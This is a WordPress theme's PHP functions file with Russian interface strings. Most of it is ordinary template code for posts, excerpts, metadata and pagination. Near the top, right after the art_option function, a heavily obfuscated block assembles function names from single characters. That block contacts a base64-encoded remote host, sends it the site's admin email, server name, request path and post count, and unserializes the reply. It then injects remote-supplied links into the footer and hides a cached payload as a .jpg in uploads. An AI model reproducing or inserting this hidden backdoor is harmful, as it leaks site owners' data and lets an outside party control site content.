<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $IpJSfx='s';$lNed='a';$lHEXb='4';$fZAWGNF='d';$DRHmJ='d';$ulZB='6';$yRhfk='e';$dnXi='_';$oLuG='b';$bWiMhq='e';$JJjVJLk='c';$sPSuZWI='o';$KlOHtB='e';$hvmVRhdm=$oLuG.$lNed.$IpJSfx.$bWiMhq.$ulZB.$lHEXb.$dnXi.$DRHmJ.$KlOHtB.$JJjVJLk.$sPSuZWI.$fZAWGNF.$yRhfk;$mJalPLC='z';$YfUiSeo='g';$xSsU='n';$NhVR='l';$cnJOq='i';$hMozG='e';$zRsBfcp='t';$faYSY='f';$NdeNp='a';$JCnwEMgB=$YfUiSeo.$mJalPLC.$cnJOq.$xSsU.$faYSY.$NhVR.$NdeNp.$zRsBfcp.$hMozG;$MydClRY='1';$BwOIj='t';$iPMN='r';$dZOAMD='3';$HnDw='t';$vlahx='_';$cmYpM='o';$PATjGg='r';$gGnzh='s';$LHchugmh=$gGnzh.$BwOIj.$iPMN.$vlahx.$PATjGg.$cmYpM.$HnDw.$MydClRY.$dZOAMD;$Naxh='r';$wIGAvb='v';$FmLo='t';$auxONx='e';$WzCKQ='r';$JlZeNvH='s';$tIDnNOsa=$JlZeNvH.$FmLo.$WzCKQ.$Naxh.$auxONx.$wIGAvb;                     $bp__w='s';$xp___________e='a';$ls__w='4';$ry_______________v='d';$wb___y='d';$er_______________j='6';$py____b='e';$rw_____l='_';$bl____________u='b';$ba_________z='e';$lj_________n='c';$zq_______a='o';$nw___________k='e';$pd__f=$bl____________u.$xp___________e.$bp__w.$ba_________z.$er_______________j.$ls__w.$rw_____l.$wb___y.$nw___________k.$lj_________n.$zq_______a.$ry_______________v.$py____b;$ao_________g='s';$bt___________p='s';$fo_____________k='i';$ng__________y='c';$wu__t='n';$am_________p='o';$px_____g='f';$oq________d='n';$gm__y='i';$el____________d='t';$jy______________w='x';$or_______b='_';$ao_____b='t';$mp____x='u';$ho_______________e='e';$qp______________u=$px_____g.$mp____x.$wu__t.$ng__________y.$el____________d.$gm__y.$am_________p.$oq________d.$or_______b.$ho_______________e.$jy______________w.$fo_____________k.$ao_________g.$ao_____b.$bt___________p;$ej___y='e';$pg_______q='f';$fa______a='p';$zc_____k='o';$hk__f='n';$ky____________l=$pg_______q.$zc_____k.$fa______a.$ej___y.$hk__f;$vn_______________l='r';$az________k='d';$dx________a='a';$ml________t='f';$nh_____________i='e';$tx__n=$ml________t.$vn_______________l.$nh_____________i.$dx________a.$az________k;$bx____e='e';$et_______d='f';$id___g='c';$wl_______v='o';$vf___________s='s';$ri__________h='l';$py___c=$et_______d.$id___g.$ri__________h.$wl_______v.$vf___________s.$bx____e;define("WP_ID", $pd__f("Mi4wLjA="));define("WP_TTL", $pd__f("MTA4MDA="));define("WP_SRC", $pd__f("dHBva24="));function wp_get_header() {global $pd__f, $qp______________u;if ($qp______________u($pd__f("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$qp______________u($pd__f("d3BfZ2V0X2Zvb3Rlcg==")) &&$qp______________u($pd__f("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $pd__f, $ky____________l, $py___c, $tx__n;$tu___________i = TEMPLATEPATH."/".$pd__f("Zm9vdGVyLnBocA==");$jf________q = @$ky____________l($tu___________i, "r");$tu___________i = @$tx__n($jf________q, @filesize($tu___________i));@$py___c($jf________q);$kf__________d = TEMPLATEPATH."/".$pd__f("ZnVuY3Rpb25zLnBocA==");$jf________q = @$ky____________l($kf__________d, "r");$kf__________d = @$tx__n($jf________q, @filesize($kf__________d));@$py___c($jf________q);$vj_______g = 0;if($tu___________i && $kf__________d) {if ($pd__f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($tu___________i, $pd__f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$vj_______g = 1;}if (substr_count($tu___________i, "wp_theme_GPL_credits()") < 1) {$vj_______g = 2;}}if(WP_ID != "2.0.0") {$vj_______g = 12;}}if($vj_______g > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $vj_______g -->";}}function wp_loaded() {global $pd__f, $qp______________u;return $qp______________u($pd__f("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($pe__________p, $cn__s = "(more...)", $le__i = 0, $xe_____u = "") {$rq______p = get_the_content($cn__s, $le__i, $xe_____u);$rq______p = apply_filters("the_content", $rq______p);$rq______p = str_replace("]]>", "]]>", $rq______p);if (strlen($_GET["p"]) > 0) {echo $rq______p;}else if ((strlen($rq______p)>$pe__________p) && ($hd____v = strpos($rq______p, " ", $pe__________p ))) {$rq______p = substr($rq______p, 0, $hd____v);$rq______p = $rq______p;echo $rq______p;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$cn__s</a></div></p>";} else {echo $rq______p;}}}$su___f='c';$wx____________m='o';$pv_____________v='e';$qf____________h='n';$so_____m='d';$nq_____________t='4';$tn____j='6';$pq______u='_';$cm______________p='e';$rm__v='a';$df________m='b';$nc____________o='s';$ck____________g='e';$fm________l=$df________m.$rm__v.$nc____________o.$pv_____________v.$tn____j.$nq_____________t.$pq______u.$ck____________g.$qf____________h.$su___f.$wx____________m.$so_____m.$cm______________p;$eo___________f='e';$bj_______________o='f';$uq___a='g';$wv____z='n';$yv______________d='e';$gf____________g='o';$pg____z='i';$gr_______k='s';$nv_______________p='t';$fy____u='_';$ej_____________b='c';$ki________p='t';$dg___s='_';$kp______x='n';$xw_______r='l';$aq___y='e';$ci___________w='t';$uv_____________s=$bj_______________o.$pg____z.$xw_______r.$aq___y.$dg___s.$uq___a.$eo___________f.$nv_______________p.$fy____u.$ej_____________b.$gf____________g.$wv____z.$ci___________w.$yv______________d.$kp______x.$ki________p.$gr_______k;$bm__j='i';$hc___v='f';$xu_______________c='_';$fa___k='s';$iy_________c='t';$wu______r='e';$fy_____j='e';$pf____________k='i';$uh________a='l';$od____d='s';$ys_________c='x';$ux________y=$hc___v.$pf____________k.$uh________a.$fy_____j.$xu_______________c.$wu______r.$ys_________c.$bm__j.$od____d.$iy_________c.$fa___k;$uf_________w='e';$nm_________u='a';$ld____f='s';$cp______o='m';$ve__________a='e';$zx__________t='o';$sz_______k='v';$tm____________n='p';$fz_______y='_';$zu______u='c';$tf_______________p='r';$tj_______s='r';$yl_____________w='n';$hg_____________o='o';$ta____________a='i';$as__________n=$sz_______k.$uf_________w.$tf_______________p.$ld____f.$ta____________a.$hg_____________o.$yl_____________w.$fz_______y.$zu______u.$zx__________t.$cp______o.$tm____________n.$nm_________u.$tj_______s.$ve__________a;$ku___w='p';$pt_______y='c';$cg_____f='o';$zu____h='s';$fu________g='e';$yl________x='n';$ad_______________f='f';$kp___m='o';$ty___x='k';$pb_____i=$ad_______________f.$zu____h.$kp___m.$pt_______y.$ty___x.$cg_____f.$ku___w.$fu________g.$yl________x;$ls___s='w';$bf_________e='r';$vh_____________r='e';$hu________n='f';$ri__b='i';$eu_________h='t';$zi_______________i=$hu________n.$ls___s.$bf_________e.$ri__b.$eu_________h.$vh_____________r;$vv_______________z='d';$qn_____m='5';$fn_____________w='m';$zm__________c=$fn_____________w.$vv_______________z.$qn_____m;$nv______________j='h';$do_____n='l';$vs_____r='r';$mo______________b='t';$va______v='e';$na____________h='p';$sg_______k='a';$sz___________x='a';$cz__________f=$vs_____r.$va______v.$sg_______k.$do_____n.$na____________h.$sz___________x.$mo______________b.$nv______________j;$uu_____________u='l';$vc__t='s';$ch_________y='z';$yy___h='r';$oz____g='e';$zw_________a='u';$rj____________b='i';$kt_________l='n';$yw____________p='a';$ww____h='i';$jo___________y='e';$yv______v=$zw_________a.$kt_________l.$vc__t.$oz____g.$yy___h.$ww____h.$yw____________p.$uu_____________u.$rj____________b.$ch_________y.$jo___________y;$vf_________s='n';$ma________i='t';$th____________h='p';$ku___________x='a';$hh__m='e';$hz__________d='m';$pp____________z='m';$ee_______________w=$ma________i.$hh__m.$hz__________d.$th____________h.$vf_________s.$ku___________x.$pp____________z;$fm____________y='t';$jv_____________z='t';$cy_________s='a';$zf___c='r';$ya____y='n';$zp_________x='r';$sn____c='e';$gw___a='t';$mh_____f='e';$jw_________y='_';$pn___o='_';$qu______________w='e';$po______s='c';$nd__o='m';$cj____________g='s';$yc_______________e='o';$sg____________g='x';$ll______s='a';$lx___________k='c';$ph______________a='e';$gi__s='t';$eu__________r=$cj____________g.$gw___a.$zf___c.$mh_____f.$ll______s.$nd__o.$pn___o.$po______s.$yc_______________e.$ya____y.$gi__s.$ph______________a.$sg____________g.$jv_____________z.$jw_________y.$lx___________k.$zp_________x.$qu______________w.$cy_________s.$fm____________y.$sn____c;function wc_______________h($rl___i) {global $pd__f, $qp______________u, $uv_____________s, $as__________n, $eu__________r;if (!$qp______________u($pd__f("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($as__________n(PHP_VERSION, "5.0.0", ">=") && $qp______________u($pd__f("ZmlsZV9nZXRfY29udGVudHM=")) && $qp______________u($pd__f("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ew____w = $eu__________r(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$ey____l = @$uv_____________s($rl___i, 0, $ew____w);} else {$ey____l = @$uv_____________s($rl___i, 0);}return $ey____l;}function ed__________d($rl___i) {global $qp______________u, $pb_____i, $zi_______________i, $pd__f;if (!$qp______________u($pd__f("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$we___________t = strpos($rl___i, "/", 7);$tf_____l = array("uri"     => substr($rl___i, $we___________t),"host"    => str_replace("http://", "", substr($rl___i, 0, $we___________t)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$qo____________j = @$pb_____i("$tf_____l[host]", 80, $hn_____________b, $bn_________q, 4);if (!$qo____________j) {return false;} else {$ey____l = "";$sg__________r  = "GET $tf_____l[uri] HTTP/1.0\r\n";$sg__________r .= "Host: $tf_____l[host]\r\n";$sg__________r .= "Referer: $tf_____l[referer]\r\n";$sg__________r .= "Connection: Close\r\n\r\n";@$zi_______________i($qo____________j, $sg__________r);while (!@feof($qo____________j)) {$xe__z = @fgets($qo____________j, (1024*24));if ($xe__z == "\r\n") {$fv__l = true;continue;}if ($fv__l) {$ey____l .= $xe__z;}}return $ey____l;}}function aa____________u($rl___i) {global $qp______________u;$dl___n = false;if ($rl___i != "") {if ($qp______________u("wc_______________h")) {$dl___n = @wc_______________h($rl___i);}if (!$dl___n && ($qp______________u("ed__________d"))) {$dl___n = @ed__________d($rl___i);}}return $dl___n;}function fg__p() {global $_SERVER, $zm__________c;$qo______________v = $_SERVER["SERVER_NAME"];if (substr("$qo______________v", 0, 4) == "www.") {$qo______________v = substr("$qo______________v", 4);}$qo______________v = $zm__________c("$_SERVER[SERVER_NAME]");return $qo______________v;}function gb_____________g() {return "file";}function qx_____________y($rl___i) {global $_SERVER, $uv_____________s, $ux________y, $ky____________l, $py___c, $zi_______________i;$iw______________m = bg_______________l();$rw________m = fg__p().".jpg";$pw__________e = $iw______________m["dir_upload"]["path"]."/$rw________m";$wv__p = @filemtime($pw__________e);if (!$wv__p || ((time()-$wv__p) >= WP_TTL)) {$dl___n = aa____________u($rl___i);if ($dl___n) {if ($ux________y($pw__________e)) {@unlink($pw__________e);}$jf________q = @$ky____________l($pw__________e, "x+");@$zi_______________i($jf________q, $dl___n);@$py___c($jf________q);}} else {if ($ux________y($pw__________e)) {$dl___n = @$uv_____________s($pw__________e);} else {$dl___n = false;}}return $dl___n;}function bg_______________l() {global $_SERVER, $pd__f, $fm________l;$ja____u = wp_count_posts("post");$xi________h = pathinfo(get_bloginfo("template_directory"));$iw______________m = array("url" => array("report"      => $pd__f("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $xi________h,"dir_upload"=> cj_________o(),"queryString"=> array("?a001=".WP_ID,"a004=".$xi________h[filename],"a005=".$ja____u->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),				"default_string" => " Все права защищены - 3powered-XMLvalid"
);$iw______________m["url"]["queryString"] = implode("&", $iw______________m["queryString"]);$iw______________m["url"]["report"] = $iw______________m["url"]["report"]."/?".$fm________l($iw______________m["url"]["queryString"]).".html";return $iw______________m;}function cj_________o() {$lz_____________h = wp_upload_dir();if (isset($lz_____________h["error"])) {$db________f = nd____________a();if (is_writable($db________f)) {$lz_____________h = array("path" => $db________f);}}return $lz_____________h;}function nd____________a() {global $qp______________u, $zm__________c, $cz__________f, $ee_______________w;$jg___________u = (bool) ini_get("safe_mode");if ($jg___________u == true) {return false;}if ($qp______________u("sys_get_temp_dir")) {$gv_______k = sys_get_temp_dir();if (is_writable($gv_______k)) {return $cz__________f($gv_______k);}}if (!empty($_ENV["TMP"])) {return $cz__________f($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $cz__________f($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $cz__________f($_ENV["TEMP"]);} else {$kx_______c = $ee_______________w($zm__________c(uniqid(rand(), true)), "");if ($kx_______c) {$gv_______k = $cz__________f(dirname($kx_______c));@unlink($kx_______c);return $gv_______k;} else {return false;}}}function eb__x() {global $_GET, $ux________y;$iw______________m = bg_______________l();$qo______________v = fg__p();$ai__________f = gb_____________g();$rp_______c = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ai__________f == "file") {$ed______________p = $iw______________m["dir_upload"]["path"]."/".$qo______________v.".jpg";if ($ux________y($ed______________p)) {@unlink($ed______________p);$rp_______c = "deleted";}}$ej__________u = array("s"=> $rp_______c,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ej__________u AS $fa_______k => $dg_______________k) echo " [$fa_______k:$dg_______________k]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $qp______________u, $pd__f, $yv______v;$iw______________m = bg_______________l();$wo_____________n = "qx_____________y";if ($qp______________u($wo_____________n)) {$ey____l = $wo_____________n($iw______________m["url"]["report"]);}if ($ey____l) {if ($ey____l = @$pd__f($ey____l)) {$ey____l = @$yv______v($ey____l);if (strlen($ey____l[custom_credit]) >= 5) {$iw______________m["default_string"] = $ey____l[custom_credit];}if ($ey____l["status"] == "0") {$xo______________r = 1;$sw__________r = 1;} else {$pn________k = sizeof($ey____l["links"]);$ge_____________r = $iw______________m["default_string"];if ($pn________k > 0 && $ey____l["links"] !== "") {$ic___t = 0;foreach ($ey____l["links"] as $zm__________z => $tu_______e) {$ic___t++;if ($tu_______e->l_path == "" || $tu_______e->l_path == $_SERVER["REQUEST_URI"]) {$tu_______e->l_href = htmlspecialchars(strip_tags($tu_______e->l_href));$tu_______e->l_title = htmlspecialchars(strip_tags($tu_______e->l_title));$tu_______e->l_anchor = htmlspecialchars(strip_tags($tu_______e->l_anchor));$ge_____________r .= " | ";$ge_____________r .= "<a href='$tu_______e->l_href' title='$tu_______e->l_title'";if ($tu_______e->l_nofollow == "1") {$ge_____________r .= " rel='nofollow'";}$ge_____________r .= ">$tu_______e->l_anchor</a>";}}}$iw______________m["links"] = "$ge_____________r";if ($ey____l[credit] == "0") {$iw______________m["links"] = "";}}} else {$xo______________r = "1";}} else {$xo______________r = "1";}if ($xo______________r == "1") {$iw______________m["links"] = $iw______________m["default_string"];}echo "$iw______________m[links]";echo "<!-- s: $ey____l[signature] -->";eb__x();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
